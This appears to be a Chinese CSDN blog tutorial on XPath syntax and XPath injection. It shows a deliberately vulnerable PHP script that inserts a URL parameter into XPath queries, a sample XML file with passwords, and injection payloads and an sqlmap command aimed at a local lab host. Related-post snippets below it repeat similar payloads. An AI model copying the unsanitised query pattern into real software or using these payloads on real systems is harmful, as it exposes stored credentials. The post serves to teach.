xpath简介之语法分析、注入实现&&Xml代码分析

最新推荐文章于 2022-02-07 22:24:00 发布
最新推荐文章于 2022-02-07 22:24:00 发布
阅读量189 收藏
点赞数
分类专栏: Hacker Way 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45650712/article/details/107988364
版权

xpath简介之语法分析、注入实现&&Xml代码分析

xpath简介:
一、xpath语法分析

介绍网址:https://www.w3school.com.cn/xpath/index.asp
在这里插入图片描述
Xpath Sql执行语句
Xml注入 xpath injection
XPath 语法
XPath 使用路径表达式来选取 XML 文档中的节点或节点集。节点是通过沿着路径 (path) 或者步 (steps) 来选取的。
在这里插入图片描述
XPath 运算符
XPath 表达式可返回节点集、字符串、逻辑值以及数字。
在这里插入图片描述
二、Xml代码分析
在这里插入图片描述

<?php 
if (file_exists('score.xml')){
        $xml = simplexml_load_file('score.xml');  //获取xml文件里面的数据
        if (isset($_GET['user'])){
                $user = $_GET['user'];
 
 
                //构造语句
                $en_scr = "//peo[@name='{$user}']/subject[contains(foo, 'english')]/score";
                $ch_scr = "//peo[@name='{$user}']/subject[contains(foo, 'chinese')]/score";
 
 
                $en_qu = $xml -> xpath($en_scr);
                $ch_qu = $xml -> xpath($ch_scr);
                foreach ($en_qu as $key => $value) {
                        echo $user.':<br>english is '.$value;
                }
                foreach ($ch_qu as $key => $value) {
                        echo '<br>'.'chinese is '.$value;
                }
        }else{
                echo 'only have three user: vk, tom, helen.';
        }
}
?>

在这里插入图片描述

<?xml version="1.0" encoding="utf-8"?>
<root>
        <class num='1'>
                <peo name='tom'>
                        <subject>
                                <foo>english</foo>
                                <score>60</score>
                        </subject>
                        <subject>
                                <foo>chinese</foo>
                                <score>70</score>
                        </subject>
                        <password>qwer123</password>
                </peo>
                <peo name='helen'>
                        <subject> 
                                <foo>english</foo>
                                <score>24</score>
                        </subject>
                        <subject>
                                <foo>chinese</foo>
                                <score>34</score>
                        </subject>
                        <password>woaichishi</password>
                </peo>
                <peo name='vk'>
                        <subject>
                                <foo>english</foo>
                                <score>100</score>
                        </subject>
                        <subject>
                                <foo>chinese</foo>
                                <score>100</score>
                        </subject>
                        <password>vk123</password>
                </peo>
        </class>
</root>

三、Xpath注入实现
http://192.168.1.106:800/xpath/xpath_inject.php?user=vk
在这里插入图片描述
http://192.168.1.106:800/xpath/xpath_inject.php?user=e
在这里插入图片描述
http://192.168.1.106:800/xpath/xpath_inject.php?user=vk’ or ‘1’=‘1
在这里插入图片描述
http://192.168.1.106:800/xpath/xpath_inject.php?user=vk’] | //* | //*[’
在这里插入图片描述
在这里插入图片描述
sqlmap -u http://192.168.1.106:800/xpath/xpath_inject.php?user=vk --data user --level 5 --risk 3
在这里插入图片描述
在这里插入图片描述
后续操作请持续关注哦!!!
了解更多请关注下列公众号:
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗
在这里插入图片描述
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗

永不垂头
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【漏洞挖掘】——121、Xpath注入深入刨析
Fly_鹏程万里
06-28 159
XPath即为XML路径语言,是W3C XSLT标准的主要元素,它是一种用来确定XML(标准通用标记语言的子集)文档中某部分位置的语言。
XML相关的安全漏洞-XXE,XPATH小结(XXE注入XPATH注入
墨痕诉清风的博客
09-04 788
DTD来规定xml意味着,DTD申明的元素下面xml必须包含,并且只能含有DTD申明的元素,(#PCDATA)为可读取的字段, (name, from)表示还包含子节点,它是个根节点或者中间节点。那一行,表示执行第三行
获取dom节点xpath &&通过xpath返回dom节点
你好,欢迎光临!
03-09 1878
html结构 <!doctype html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0"> <meta http-equ
[python爬虫之路day4]:xpath基本知识&&lxml结合xpath进行数据分析&&爬取豆瓣电影
dinnersize的博客
02-16 565
**********XPath:******XPath是一门在xml和html语言中查找信息的一门语言,可以对xml和html文档的元素和属性进行遍历。 chrome中的插件: XPath helper Firefox插件:Try XPath XPath语法: 谓语(Predicates): 谓语用来查找某个特定的节点或者包含某个指定的值的节点。 谓语被嵌在方括号中。 xpath使用方法:用 “ ...
#Python&&xpath解析及案例演示
weixin_48321071的博客
01-28 351
解析 = > xpath(含义) 安装 相应的库 案例 =>加深理解印象 from lxml import etree # 如果pychar报错,可以考虑这种导入方式 # from lxml import html # etree = html.etree # import xml.etree.ElementTree as ET xml = """ <book> <id>1<id> <name>野花遍地香</name&
XPath 简单语法
04-08
XPath 简单语法XPath 简单语法XPath 简单语法XPath 简单语法XPath 简单语法XPath 简单语法
mysql xpath注入_XML注入场景
weixin_28881787的博客
02-07 243
XML 指可扩展标记语言,XML 被设计用来传输和存储数据。XML注入一般指在请求的XML数据中插入攻击利用代码,根据不同的场景,可能会形成以下的漏洞形式:1、xeeXMLEntity Expansion2、xxeXXE InjectionXML External Entity Injection3、soap注入4、XPath注入XPath 是一门在 XML 文档中查找信息的语言。XPath 可...
XPath-Injection:XPath注入脚本
04-02
XPath注入是一种针对XML数据的攻击方式,通过构造恶意的XPath表达式来欺骗应用程序,获取未经授权的数据或者执行非预期的操作。这种攻击通常发生在应用接受用户输入的XPath查询,并直接用于解析XML文档时。在这个名...
102.网络安全渗透测试—[常规漏洞挖掘与利用篇18]—[xpath注入与盲注入]
qwsn
02-07 4512
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、xpath注入与盲注入 1、什么是xpath注入 2、什么是xpath注入 3、xpath查询基本语句 二、xpath注入示例 1、注入漏洞页面源码:xpath.php 2、注入漏洞页面关键源码分析 3、账户信息存储文件:`xpath_user.xml` 4、注入方法 (1)万能密码登录: (2)payload分析: 5、盲注入 (1)获取字符长度函数:`string-length()` (2)截取字符函数:`su
Xpath注入攻击及其防御技术研究
10-10
5. **转义特殊字符**:对于直接包含用户输入的情况,必须转义所有特殊字符,防止它们被解释为XPath语法的一部分。 6. **限制查询复杂度**:通过对查询的长度或深度设置限制来防止资源耗尽。 7. **日志记录与监控**:...
XPath Inject
weixin_30438813的博客
07-14 123
目录 Attack Principle Attack Inject Way Query boolean Document Scan Bind Inject Attack Principle Server use XPath , C...
mysql漏洞函数xpath_【漏洞汇总】SQL 注入漏洞之 mysql
weixin_35917998的博客
01-19 533
日期:2019-07-23 19:55:59更新:2019-08-02 10:40:37作者:Bay0net介绍:Mysql 注入笔记0x01、 基本信息1.1 基本术语数据库: 数据库是一些关联表的集合。数据表: 表是数据的矩阵。在一个数据库中的表看起来像一个简单的电子表格。列: 一列(数据元素) 包含了相同类型的数据, 例如邮政编码的数据。行:一行(=元组,或记录)是一组相关的数据,例如一条用...
XPath运算符
czsd82的专栏
09-11 910
XPath运算符翻译:无 / 2006-03-24An XPath expression returns either a node-set, a string, a Boolean, or a number.XPath OperatorsBelow is a list of the operators that can be used in XPath expressions
mysql xpath注入工具_WEB安全第四篇--与数据库的亲密接触:SQL注入攻击
weixin_28849929的博客
02-17 143
零、前言最近做专心web安全有一段时间了,但是目测后面的活会有些复杂,涉及到更多的中间件、底层安全、漏洞研究与安全建设等越来越复杂的东东,所以在这里想写一个系列关于web安全基础以及一些讨巧的payload技巧以便于备忘。不是大神、博客内容非常基础,如果真的有人看而且是大牛们,请不要喷我,欢迎指正我的错误(水平有限)。一、SQL注入的本质:用户的输入与代码中的SQL语句拼接,可以构成完整的有效的可...
墨者学院 - XPath注入漏洞实战
多崎巡礼的博客
08-20 973
网站网址为   /demo.php?name=xml ,可能存在XPath漏洞    在网址最后面加上   ' or 1=1 or ''='      或者      ']|//*|//*[' ' or 1=1 or ''='   闭合语句再绕过,类似于sql注入。   ']|//*|//*[' xpath语法,访问xml的所有节点 类似sql注入,绕过查询 条件   秒解...
Python爬虫:Xpath语法笔记
chenxuan5849的博客
03-17 693
一、选取节点 常用的路劲表达式: 表达式 描述 实例 nodename 选取nodename节点的所有子节点 xpath('//div') 选取了div节点的所有子节点 ...
SQLMAP自动注入(三)—Injection,Detection,Techniques
weixin_30337251的博客
07-16 167
-p 指定扫描的参数 ,对于user-agent,referer,host进行扫描 sqlmap -u "url地址" -p "user-agent,host" --dbs --skip 排除指定参数扫描 --skip"id,user-agent" URI注入sqlmap -u "http://targeturl/paraml/value*/value2" ...
最全的xpath语法
热门推荐
u014689510的博客
06-10 1万+
原文:https://msdn.microsoft.com/zh-cn/library/ms256086(v=vs.80).aspx 本主题回顾整个 XPath 参考中出现的语法示例。所有示例均基于 XPath 语法的示例 XML 文件 (inventory.xml)。有关在测试文件中使用 XPath 表达式的示例,请参见本主题最后的“联合 ( | ) 示例”。
php 怎么用xpth,PHP xpath()函数讲解
weixin_33603802的博客
03-12 144
PHP xpath() 函数定义和用法xpath()函数运行对 XML 文档的 XPath 查询。如果成功,该函数返回 SimpleXMLElements 对象的一个数组。如果失败,则返回 FALSE。语法class SimpleXMLElement{string xpath(path)}实例XML 文件ToveJaniReminderPHP 代码$xml = simplexml_load_fil...
XPathXML查询中的重要性与应用
XML Web Service安全方面,XPath也可能成为攻击的途径,比如XPath注入。攻击者可能通过构造恶意的XPath表达式,试图获取服务器上的敏感信息。因此,在使用XPath处理用户输入时,必须进行适当的验证和过滤,防止...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值